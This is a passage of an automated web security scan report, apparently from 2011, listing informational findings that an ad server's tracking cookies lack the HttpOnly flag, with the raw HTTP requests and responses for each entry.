Location: http://www.scottrade.com?cid=AM|74|1655|1163|221&rid=B2|0&amvid=OPT_OUT&$7Dollar
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

13.31. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1182.iframe.120x60/** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1182.iframe.120x60/**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

c_1=74:1655:1182:221:0:51011:1315328751:B2|74:1655:1182:221:0:51011:1315328750:B2|46:1542:1206:131:1736690:55175:1315313319:L; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1182.iframe.120x60/** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: c_1=74:1655:1182:221:0:51011:1315328751:B2|74:1655:1182:221:0:51011:1315328750:B2|46:1542:1206:131:1736690:55175:1315313319:L; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/
Location: http://www.scottrade.com/LP/symbol/?cid=AM|74|1655|1182|221&rid=B2|0&amvid=OPT_OUT&active,smarttext,$7dollar
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

13.32. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

c_1=74:1655:1205:221:0:51011:1315328751:B2|74:1655:1182:221:0:51011:1315328751:B2|74:1655:1182:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: c_1=74:1655:1205:221:0:51011:1315328751:B2|74:1655:1182:221:0:51011:1315328751:B2|74:1655:1182:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/
Location: http://www.scottrade.com?cid=AM|74|1655|1205|221&rid=B2|0&amvid=OPT_OUT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

13.33. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

c_1=74:1655:1206:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: c_1=74:1655:1206:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/
Location: http://www.scottrade.com/online-trading.html?cid=AM|74|1655|1206|221&rid=B2|0&amvid=OPT_OUT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

13.34. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1209.iframe.120x60/** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1209.iframe.120x60/**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

c_1=74:1655:1209:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1209.iframe.120x60/** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: c_1=74:1655:1209:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/
Location: http://www.scottrade.com/online-brokerage/trading-fees-commissions.html?cid=AM|74|1655|1209|221&rid=B2|0&amvid=OPT_OUT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

13.35. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

c_1=74:1655:46:221:0:51011:1315328751:B2|74:1655:46:221:0:51011:1315328751:B2|74:1655:1182:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: c_1=74:1655:46:221:0:51011:1315328751:B2|74:1655:46:221:0:51011:1315328751:B2|74:1655:1182:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/
Location: http://www.scottrade.com?cid=AM|74|1655|46|221&rid=B2|0&amvid=OPT_OUT&$7dollar
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

13.36. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.721.iframe.120x60/** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.721.iframe.120x60/**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

c_1=74:1655:721:221:0:51011:1315328751:B2|74:1655:1206:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.721.iframe.120x60/** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: c_1=74:1655:721:221:0:51011:1315328751:B2|74:1655:1206:221:0:51011:1315328751:B2|74:1655:1163:221:0:51011:1315328751:B2; expires=Fri, 07-Oct-2011 17:05:51 GMT; path=/
Location: http://www.scottrade.com?cid=AM|74|1655|721|221&rid=B2|0&amvid=OPT_OUT&fund
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

13.37. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:1182:221:0:50987:1315321534:B2|46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 15:05:34 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/4787978?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:05:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1182:221:0:50987:1315321534:B2|46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 15:05:34 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1144

function wsod_tag() {
document.write('<style type="text/css">\n a#wsoB{color:black;text-decoration:none;text-shadow: 1px 1px 2px white;}\n a#wsoB:hover{color:black;text-decoration:underline;text-sh
...[SNIP]...

13.38. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:1205:221:0:50988:1315321844:B2|74:1655:1182:221:0:50987:1315321534:B2|46:1542:1206:131:0:55175:1315313297:L; expires=Fri, 07-Oct-2011 15:10:44 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/7865964?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1182:221:0:50987:1315321534:B2|46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:10:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1205:221:0:50988:1315321844:B2|74:1655:1182:221:0:50987:1315321534:B2|46:1542:1206:131:0:55175:1315313297:L; expires=Fri, 07-Oct-2011 15:10:44 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 751

function wsod_image1655() {
document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...

13.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:1182:221:0:50989:1315322154:B2|74:1655:1205:221:0:50988:1315321844:B2|74:1655:1182:221:0:50987:1315321534:B2; expires=Fri, 07-Oct-2011 15:15:54 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/5914301?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1205:221:0:50988:1315321844:B2|74:1655:1182:221:0:50987:1315321534:B2|46:1542:1206:131:0:55175:1315313297:L

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:16:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1182:221:0:50989:1315322154:B2|74:1655:1205:221:0:50988:1315321844:B2|74:1655:1182:221:0:50987:1315321534:B2; expires=Fri, 07-Oct-2011 15:15:54 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1144

function wsod_tag() {
document.write('<style type="text/css">\n a#wsoB{color:black;text-decoration:none;text-shadow: 1px 1px 2px white;}\n a#wsoB:hover{color:black;text-decoration:underline;text-sh
...[SNIP]...

13.40. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2|74:1655:1205:221:0:50988:1315321844:B2; expires=Fri, 07-Oct-2011 15:21:04 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/6673089?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1182:221:0:50989:1315322154:B2|74:1655:1205:221:0:50988:1315321844:B2|74:1655:1182:221:0:50987:1315321534:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:21:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2|74:1655:1205:221:0:50988:1315321844:B2; expires=Fri, 07-Oct-2011 15:21:04 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 752

function wsod_image1655() {
document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA" t
...[SNIP]...

13.41. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2; expires=Fri, 07-Oct-2011 15:26:13 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/6546395?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2|74:1655:1205:221:0:50988:1315321844:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:26:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2; expires=Fri, 07-Oct-2011 15:26:13 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 747

function wsod_image1655() {
document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...

13.42. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2; expires=Fri, 07-Oct-2011 15:31:20 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/7828836?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2|74:1655:1182:221:0:50989:1315322154:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:31:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2; expires=Fri, 07-Oct-2011 15:31:20 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 751

function wsod_image1655() {
document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...

13.43. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2; expires=Fri, 07-Oct-2011 15:36:28 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/7171989?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L; c_1=46:1542:1206:131:1736690:55175:1315313319:L; f8=258981:et:8:ETF:07:4:; i_1=74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2|74:1655:46:221:0:50990:1315322464:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:36:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2|74:1655:1163:221:0:50991:1315322773:B2; expires=Fri, 07-Oct-2011 15:36:28 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 752

function wsod_image1655() {
document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/**;10.3183;1920;1200;http:_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA"
...[SNIP]...

13.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:1206:221:0:50994:1315323696:B2|74:1655:1206:221:0:50993:1315323388:B2|74:1655:1205:221:0:50992:1315323080:B2; expires=Fri, 07-Oct-2011 15:41:36 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/600712?click=Insert_Click_Track_URL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
